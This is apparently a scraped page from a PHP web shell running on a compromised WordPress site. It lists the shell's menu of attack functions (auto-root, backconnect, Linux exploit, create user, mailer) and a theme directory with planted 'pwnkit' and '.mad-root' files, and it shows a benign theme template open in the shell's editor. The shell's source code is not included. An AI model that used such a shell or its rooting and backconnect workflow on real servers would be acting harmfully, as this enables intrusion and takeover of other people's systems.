Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
alpha /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
country-flags
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.eslintrc.js
132
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.prettierrc.js
246
B
-rw-r--r--
.stylelintrc.json
41
B
-rw-r--r--
404.php
1.54
KB
-rw-r--r--
LICENSE
17.62
KB
-rw-r--r--
README.md
4.39
KB
-rw-r--r--
archive.php
693
B
-rw-r--r--
block-editor-style.css
210.42
KB
-rw-r--r--
block-editor-style.css.map
12.98
KB
-rw-r--r--
comments.php
1.92
KB
-rw-r--r--
composer.json
1.28
KB
-rw-r--r--
composer.lock
41.29
KB
-rw-r--r--
editor-fonts.css
130.45
KB
-rw-r--r--
editor-fonts.css.map
918
B
-rw-r--r--
footer-splash.php
460
B
-rw-r--r--
footer.php
453
B
-rw-r--r--
functions.php
10.87
KB
-rw-r--r--
header-splash.php
1.64
KB
-rw-r--r--
header.php
2.81
KB
-rw-r--r--
home.php
1.83
KB
-rw-r--r--
index.php
1.24
KB
-rw-r--r--
package-lock.json
1.39
MB
-rw-r--r--
package.json
1.8
KB
-rw-r--r--
page.php
790
B
-rw-r--r--
phpcs.xml.dist
3.97
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
1.33
KB
-rw-r--r--
screenshot.png
29.5
KB
-rw-r--r--
search.php
1.06
KB
-rw-r--r--
sidebar.php
343
B
-rw-r--r--
single-product.php
492
B
-rw-r--r--
single.php
1017
B
-rw-r--r--
style-rtl.css
205.85
KB
-rw-r--r--
style.css
205.92
KB
-rw-r--r--
style.css.map
17.6
KB
-rw-r--r--
template-splash.php
636
B
-rw-r--r--
test.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : home.php
<?php /** * Blog template * * @package Alpha */ get_header(); ?> <main id="primary" class="site-main blog-archive <?php echo ! is_paged() ? 'index' : ''; ?>"> <?php if ( have_posts() ) : ?> <?php if ( is_home() && ! is_front_page() && ! is_paged() ) : the_post(); $background_id = false; if ( get_field( 'default_blog_image', 'option' ) ) { $background_id = get_field( 'default_blog_image', 'option' ); } elseif ( has_post_thumbnail() ) { $background_id = get_post_thumbnail_id(); } if ( false !== $background_id ) { $background_url = wp_get_attachment_image_url( $background_id, 'full' ); $background_url_mobile = wp_get_attachment_image_url( $background_id, 'large' ); ?> <style> #alpha-blog-hero .background { background-image: url( <?php echo esc_url( $background_url ); ?> ); } @media (max-width: 480px) { #alpha-blog-hero .background { background-image: url( <?php echo esc_url( $background_url_mobile ); ?> ); } } </style> <?php } ?> <section id="alpha-blog-hero" class="alpha-hero alpha-hero-blog alpha-hero-full-page"> <div class="background"></div> <div class="alpha-hero-content alpha-hero-blog-card"> <h3><?php _e( 'Blog', 'alpha' ); ?></h3> <div class="alpha-hero-blog-summary"> <div class="date"><?php the_time( 'M j, Y' ); ?></div> <h2><?php the_title(); ?></h2> </div> <p><a href="<?php the_permalink(); ?>"><?php _e( 'Read Article', 'alpha' ); ?></a></p> </div> </section> <?php endif; ?> <div class="all-posts-header"> <h2><?php _e( 'All Posts', 'alpha' ); ?></h2> </div> <?php get_template_part( 'template-parts/list-posts' ); ?> <?php get_sidebar(); ?> <?php endif; ?> </main><!-- #main --> <?php get_footer();
Close